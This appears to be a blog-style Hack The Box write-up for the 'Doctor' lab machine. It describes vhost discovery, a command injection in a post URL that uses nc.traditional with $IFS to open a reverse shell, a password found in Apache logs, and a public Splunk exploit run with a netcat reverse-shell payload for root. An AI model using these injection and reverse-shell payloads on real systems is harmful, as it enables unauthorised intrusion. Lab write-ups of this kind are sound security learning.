How I completed CTF on HTB::Doctor
Firstly, I scanned the target with nmap to find open ports and get some information on the internal ports of the target and service running on them.
Since it runs http server on port 80, I opened the target IP address in the web browser and visited the website but I didn’t find anything suspicious to hack.
I was scratching my head finding nothing and I got attracted to email@example.com and then did something I didn’t thought about.
I went to terminal and typed
sudo nano /etc/hosts to edit hosts file in my local machine or simply to say to edit my local DNS.
After editing local DNS, I went back to the web browser and this time I browsed with domain name (doctors.htb) instead of
10.10.10.209 and different webpage got rendered.
Isn’t this amazing? Different webpage got rendered although domain name point towards the same IP address.
Let me explain you why this happens, if you browse to a box using appropriate domain name (in our case, doctors.htb), web-server will direct you to the content based on the host header that your browser supplies instead if you browse with raw IP, you may land on different webpage or sometimes error page.
You can see this in action right here. You browsed to medium.com and got the page rendered, now if you try browsing directly to
22.214.171.124 , you’ll be rendered different page (in this case error page).
Okay, back to the action. I tried SQL injection on the login page but it didn’t happen to be working. I then looked at the register page and tried registering in it and I got registered.
I then logged in with the credentials I registered with.
I got logged in as a user and I looked towards the application and discovered webpage to make a new post. I then opened Netcat to listen on port 4444.
After running netcat on my local machine, I returned back to the website and then tried posting.
http://10.10.14.23/$(nc.traditional$IFS-e$IFS/bin/sh$IFS’10.10.14.23’$IFS’4444’) is vulnerable to RCE.
10.10.14.23 is my tunnel IP address, to make this work for you, you need to replace it with whatever tunnel IP address is yours and we will get shell access to the machine as a low privileged user.
When I tried viewing user flag, permission was denied.
While moving around the website I had discovered /reset_password path in the website where user can enter the email and reset the password. Since it was running on apache server, I tried accessing the log file of the server and looked for password on backup file.
I found password of the user shaun was
Guitar123 and I logged in as user shaun and captured user flag.
You may have looked at nmap scan result before and noticed port 8089 is open which says splunk running on it. So, I googled for “splunk exploit on github” and found SplunkWhisper2 python script by cnotin.
I created a file with
nano splunk-exploit.py and copied the script into it and saved it. After this, I ran netcat on port
4445 and I ran the exploit with command :
python3 splunk-exploit.py --host 10.10.10.209 --lhost 10.10.14.23 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.23' '4445'"
10.10.14.23 with your own tunnel IP address.
It gave me root access within some seconds and I captured root flag.
Share some suggestions you got and what did you like and dislike in this write-up.